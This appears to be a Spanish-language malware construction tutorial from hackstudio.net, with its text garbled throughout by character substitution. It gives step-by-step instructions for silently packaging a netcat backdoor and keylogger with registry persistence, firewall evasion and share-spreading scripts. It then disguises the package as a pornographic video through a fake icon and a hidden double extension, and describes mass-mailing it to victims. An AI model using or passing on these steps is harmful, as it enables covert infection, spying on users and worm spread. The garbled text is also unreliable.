;odemos acceder a ie$press desde >inicio![ejecutar?, tecleamos
ie$press. ,ebe desplegar la siguiente ventana (donde debe estar la
opcin de crear un nuevo paquete e$traible)0
Seleccionamos la opcin crear nuevo arc"ivo de directivas de auto!
e$traccin. <uego, (Siguiente)
En la interfa& para seleccionar el propsito del paquete
seleccionamos (e$traer arc"ivos % ejecutar comandos de
nkt@hackstudio.net
instalacin) (vamos a necesitar que desde a"' se ejecuten nuestros
scripts. (Siguiente)0
<e damos un t'tulo al pro%ecto (en este caso, empaquetaremos
nuestros scripts en un arc"ivo que se llame *orm.e$e).
(Siguiente)0
6bviamente le decimos al paquete que no (promptee) al usuario con
avisos % notificaciones. (Siguiente) (Yque otra cosa esperabanZZ)0
nkt@hackstudio.net
6bviamente que ser'a rid'culo desplegar una licencia para la
instalacin de un mal*are. (Siguiente)0
Seleccionamos todos los arc"ivos que vamos a requerir. Esto
inclu%e tanto los ejecutables de nuestro pa%load (nc.e$e que a"ora
se llama *inA@.e$e, el #e%logger, etc.), adems de los scripts que
"emos desarrollado (los scripts que reali&an el boot<oader en el
registro, el script de distribucin en carpetas compartidas, el
arc"ivo que contiene la lista de direcciones -;, los scripts que
reali&an la evasin del fire*all de *indo*s, % todo lo que puedas
necesitar ... ). Solo dale (Siguiente)0
nkt@hackstudio.net
En este punto es donde se debe tener cuidado. ,ebes seleccionar
los scripts para que se ejecuten antes o despus del
desempaquetamiento. +omo se puede notar en el previe*, puede
seleccionar tanto scripts dentro del paquete, como cualquier
comando que desees que se ejecute. (Siguiente)0
6bviamente seleccionamos la opcin de desempaquetamiento oculto %
como de costumbre\ (Siguiente)0
nkt@hackstudio.net
ùe no despliegue ning5n tipo de mensaje (obvio). Siguiente0
(]auti&amos) el paquete (con e$tensin .e$e), % le decimos que
6culte el proceso de desempaquetamiento (nada de animaciones al
usuario). (Siguiente)0
nkt@hackstudio.net
Seleccionamos la opcin de no rebootear el sistema (en verdad,
cualquier reinicio, %a se convierte en una actividad bastante
sospec"osa). (Siguiente)0
Ta que el desarrollo de mal*are es (altamente adictivo), es
probable que quieras guardar el pro%ecto para volver a
empaquetarlo en momentos posteriores, o reali&ar mejoras. <o
recomendable es salvar elpro%ecto en un arc"ivo .SE,. (,oble
Siguiente)0
nkt@hackstudio.net
Si todo el proceso de empaquetamiento sali bien, no debe
notificar ning5n tipo de error (,oneG).
Si revisas en el e$plorador, tienen que "aberse generado tanto el
paquete *orm.e$e como el arc"ivo del proceso de empaquetamiento
*orm.SE,. T <-S/6 GGG, al dar doble clic# en el ejecutable, se
nkt@hackstudio.net
e$traen los arc"ivos en algunas carpetas temporales % se ejecutan
los scripts en el orden que "a%as seleccionado. +omo lo anterior
fue demostracin, a continuacin se narra como reali&ar el proceso
de empaquetamiento con los scripts que tenemos0
7. empaqueta en un ejecutable los scripts que contienen la
violacin del registro tanto para la instalacin del mal*are como
para la evasin del fire*all.
@. empaqueta en otro ejecutable el script de distribucin del
mal*are en carpetas compartidas.
A. empaqueta en otro ejecutable los dos anteriores ejecutables
dicindole al paquete que primero se ejecute el paquete que
reali&a la violacin del registro % luego el paquete que reali&a
la distribucin. :"ora, tiene que "aber quedado un solo ejecutable
que reali&a las tres funciones0 instalacin del bac#door en el
registro, evasin del fire*all % copia del cuerpo del mal*are en
las carpetas compartidas.
D. empaqueta en otro ejecutable los ejecutables que constitu%en el
bac#door. En el caso de este pro%ecto, ser *inA@.e$e (netcat), %
el #e%logger.
E. empaqueta en otro ejecutable, el ejecutable con todos los
scripts % el ejecutable que contiene el bac#door. En este momento
te tiene que quedar un solo ejecutable que contiene (% ejecuta)
inicialmente todos los scripts % adems debe contener el pa%load
(en este caso, el bac#door).
3ale la pena recalcar que "asta a"ora, el mal*are con todos los
arc"ivos que "emos empaquetado, no pesa ms de 9F Bb. Se "a
conseguido lo que nos "emos propuesto, pues ese valor lo "ace un
arc"ivo bastante liviano (% distribuible).
:s', de tanto empaquetar % empaquetar, este trabajo, no es sino
pura (labor de carpinter'a).
(7* t#o.aniAaci?n.
:unque %a tenemos el mal*are, necesitamos un mecanismo de
activacin. 6bviamente, ese mecanismo es alg5n usuario ejecute o
de doble clic# sobre el ejecutable del mal*are. ;ara (generar
confian&a) en el usuario a que active el mal*are, generaremos otro
paquete especial que tro%ani&ar nuestro mal*are. ;ara ello
utili&aremos *inrar. :"' va GG. ;rimero, debemos escojer un
(an&uelo). Este puede ser un arc"ivo multimedia (preferiblemente).
En el caso de un escenario de una empresa t'pica colombiana,
podr'amos tomar un peda&o de un video con contenido pornogrfico
(casi nadie evita dar doble clic# sobre algo as'). ;ara no
aumentar muc"o el tamao del tro%ano, podemos tomar cualquier
video en formato .avi % editarlo reduciendo la longitud de la
nkt@hackstudio.net
secuencia en una aplicacin de bastante uso como camtasia.
6bservemos el previe*0
:l seleccionar aadir al arc"ivo, selecciono la opcin de generar
arc"ivo especial en formato SCX (:rc"ivo auto!e$traible)0
<uego vamos a la pestaa (avan&adas) % seleccionamos opciones SCX,
donde podemos establecer la ruta de e$traccin de arc"ivos % los
comandos de ejecucin (scripting) antes % despus de la
e$traccin0
nkt@hackstudio.net
En Qodos, seleccionamos las opciones de 6cultar todo tipo de
animacin al usuario, % en caso de e$istir el arc"ivo, sobre!
escribirlo.
+on eso basta. :unque *inrar nos presenta una pltora de m5ltiples
opciones (entre las cuales est la seleccin de un icono), es
suficiente como para lo que necesitamos. ;odemos tro%ani&ar el
mal*are utili&ando cualquier tipo de arc"ivo (atractivo) para que
el usuario d doble clic#, p.e. QpA, jpg, flas" (que tambin tiene
nkt@hackstudio.net
e$tensin .e$e), etc. En este momento, disponemos de un ejecutable
que contiene el mal*are % un ejecutable que despliega el video
(an&uelo). Yù viene a"oraZZ, pues con ie$press puedes crear el
paquete total. ,onde se empaquetan tanto el (an&uelo) (ejecutable
que despliega el video), como el mal*are en s' (el ejecutable
empaquetado que se detall en la seccin anterior). Sin embargo,
si observamos el arc"ivo desde el e$plorador de *indo*s, se ve que
el paquete total tiene un icono que no se reconoce fcilmente.
3amos a utili&ar la conocida (resJac#er) para cambiar el icono de
tal manera que realmente pare&ca un arc"ivo multimedia.
,esplegamos .esJac#er, seleccionamos nuestro mal*are tro%ani&ado %
buscamos el icono de un video dentro del sistema para reali&ar el
reempla&o. 6bservemos el previe*.
(donde (video+arlaîraldo.e$e) es el paquete que contiene tanto el
mal*are desarrollado en la seccin anterior, como el video
empaquetado anteriormente con *inrar).
Seleccionamos cualquier ejecutable desde donde deseamos cargar el
icono (en este caso, para simular un arc"ivo de un verdadero
video, utili&aremos el mismo icono de *indo*s media pla%er, %
nkt@hackstudio.net
damos la opcin reempla&ar. Solo resta guardar el pro%ecto, % si
observamos nuevamente nuestro arc"ivo desde el e$plorador podremos
ver un (lindo arc"ivo aparentemente de video) con el nombre de
nuestro mal*are tro%ani&ado.
T <-S/6 GGGG... :"ora, p.e. En este caso se cambi el nombre por
(video+arlaîraldo.avi.e$e). Si "ablamos de una red t'pica
colombiana con sistemas *indo*s X; en sus instalaciones por
defecto, lo ms seguro, es que en los e$ploradores de las mquinas
v'ctimas est "abilitada la opcin (ocultar e$tesiones de arc"ivos
conocidos). <o que "ar que se oculte la e$tensin .e$e % por lo
tanto (el nombre visible del mal*are) realmente aparecer como
(video+arlaîraldo.avi). 6bviamente lo ideal ser'a que el tro%ano
se cargue desde un verdadero arc"ivo multimedia. Esto no es
dif'cil de "acer, sin embargo, (ser en otra ocasin, jeG), pues.
para los requerimientos de este pro%ecto, basta con lo "ec"o "asta
a"ora.
E$isten un resto de tcnicas alternativas para tro%ani&ar nuestro
mal*are. Entre ellas estn los ,ata Streams, Qacros en arc"ivos
office, objetos ole incluidos en documentos (basta con
incrustarlos), *rappers en arc"ivos .flas", ejecucin de comandos
desde arc"ivos que se ejecutan en *indo*s media pla%er, etc. 4o
las veremos en este documento, pero cualquier desarrollador de
mal*are puede pasar largos % entretenidos ratos mejorando %
puliendo lo logrado "asta a"ora con tcnicas ms refinadas %
(diablicas).
Es obvio suponer, que si das doble clic# sobre el arc"ivo que
contiene el mal*are tro%ani&ado debe suceder los siguiente0
E$pl'citamente0
>!? ,ebe desplegarse el video (o cualquier tipo de an&uelo
incluido)
-mpl'citamente (% de forma oculta)0
>!? el registro debe "aber sido modificado para aceptar que se
abra un puerto por el bac#door sin que el fire*all (se oponga)
>!? el registro debe "aber sido modificado para cargar el bac#door
al iniciar la mquina
>!? el cuerpo del tro%ano debe "aberse intentado copiar a las
carpetas compartidas encontradas en la lista de direcciones -;.
nkt@hackstudio.net
>!? se debe "aber abierto la puerta trasera en estado de escuc"a
de cone$iones en el puerto autori&ado en el registro
>!? se debe ejecutar cualquier otro proceso incluido, p.e. ;ara
este pro%ecto, deber'a estar en ejecucin el #e%logger.
<o 5nico que resta, es re!enviar el (famoso video) a la ma%or
cantidad de direcciones de correo electrnico ... % esperar. En el
caso de este pro%ecto, solo ser'a necesario detectar puertos
abiertos escuc"ando cone$iones en el puerto OOO ... (a lo mejor es
nuetra plaga en accin, 0;)...
------------------------------------------------------------------
An3isis . Concusiones
------------------------------------------------------------------
Es importante tener en cuenta0
>!? 4o utili&amos ninguna tecnolog'a sofisticada. ;rcticamente
todo se limit (al poder de la consola) en ejecutar scripts. /odos
los recursos requeridos estaban totalmente al alcance de
(cualquiera).
>!? El conocimiento de todas estas tcnicas anteriormente
mencionadas sirve no solamente para desarrollar pro%ectos con
(intenciones malvolas), tambin sirve para el desarrollo de
vacunas contra mal*are. Simplemente se empaquetan scripts que con
la capacidad de revertir las actividades maliciosas del mal*are
que se desea vacunar. En pocas palabras, no solo se trata de
plantear mediante este pro%ecto tcnicas nocivas para una
infraestructura informtica. El conocimiento de estas tcnicas es
la mejor forma de combatir este tipo de ataques.
>!? /odas las actividades anteriores (e$cepto el cambio de icono),
son scriptables. Esto significa que con buena prctica %
e$periencia, se pueden automati&ar (%a lo "aremos en su momento).
>!? 4o necesitamos prcticamente ning5n mtodo de programacin (ni
siquiera utili&amos lenguajes de programacin), no necesitamos
ning5n principio especial de la ingenier'a del soft*are,
cualquiera con algo de dedicacin est en la capacidad de
desarrollar este tipo de pro%ectos, no se requiere de la a%uda de
un (super!"ac#er) ... todo esto lo podemos "acer prcticamente con
las uas ... ahora lo que debemos aprender es a tener las uas
!bien a"iladas# ...
>!? divirtete, % disfr5talo cuanto puedas ... a"G, % no olvides
invitarme ... n#tH"ac#studio.net, n#t.liamHgmail.com . Jasta la
pr$ima \;
nkt@hackstudio.net
------------------------------------------------------------------
Auto#
------------------------------------------------------------------
Guie#$o Mu#ado. -ngeniero en Electrnica % /elecomunicaciones de
la Iniversidad del +auca. ^rupo de -nvestigacin en /ecnolog'as de
la -nformacin (^/-), area de -nvestigacin en Seguridad
-nformtica, Egresado @FFA. Es "Jac#tivista" con una E$periencia
de casi P aos en -nvestigacin % ,esarrollo de Soluciones en
Seguridad -nformtica e -nteligencia :rtificial. El ;rototipo del
;ro%ecto -nCorce /ec"nolog% recibi el reconocimiento de Qencin
de Jonor por /rabajo -nnovador en el area de Seguridad
-nformtica. :ctualmente reside en ;opa%n!+auca, % trabaja para
la Iniversidad del +auca en el area de Sistemas. Es ,esarrollador
:van&ado en tecnolog'as 2:3: (2@S,B, 2@EE), investiga en
Qetodolog'as % Estndares de +alidad de Soft*are, % trabaja en el
surgimiento de "ac#Studio >"ttp011"ac#studio.net? , ;ro%ecto
Empresarial cu%o +ore (n5cleo) de 4egocio es la -nvestigacin %
,esarrollo de Soluciones en /ecnolog'a -nformtica. Es el
:rquitecto % ;rincipal ,esarrollador de -nCorce /ec"nolog% %
Jac#Studio ;roject, % ,edica su /iempo ,isponible en la Edicin de
su ;ropuesta -nvestigativa0 "-ngenier'a en Seguridad -nformtica"
que estar disponible al ;5blico en Cormato de <ibro (si es que
alg5n d'a la termina, jeje).
+ontactos en n#tH"ac#studio.net , n#t.liamHgmail.com
+el. AFF OE7 F9DO
------------------------------------------------------------------
N#e>e Ni&io'#a2,a
------------------------------------------------------------------
(-* OILTSI0P Lenn.. Qal*are0 Cig"ting malicious code. @FFA
(-* HQGLRN;P G#e'. NRTLI0P Ma$es. .oot#its0 Subverting t"e Nindo*s
Bernel. @FFE
(-* LQSTI0P Ma$es. Soc#ets, S"ellcode, ;orting b +oding. .everse
Engineering E$ploits and /ools +oding for Securit% ;rofessionals. @FFE
(-* LR;WIGP =a#k. /"e <ittle ]lac# ]oo# of computer 3iruses. Editorial
:merican eagle publications.
(-* 0Q;AQP MesSs. 3irus de Sistemas -nformticos e -nternet. Editorial
:lfa 6mega @FFF.
(-* 1i#us Nuetin, 6ctubre @FFE c Enero @FFO. "ttp011***.virusbtn.com
(-* http://%%%.hispasec.co$/di#ecto#io/a&o#ato#io/a#ticuos/

Hacking Within Nails

Загружено:

Сведения о документе

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Hacking Within Nails

Загружено:

Авторское право:

Доступные форматы

http://hackstudio.

Вам также может понравиться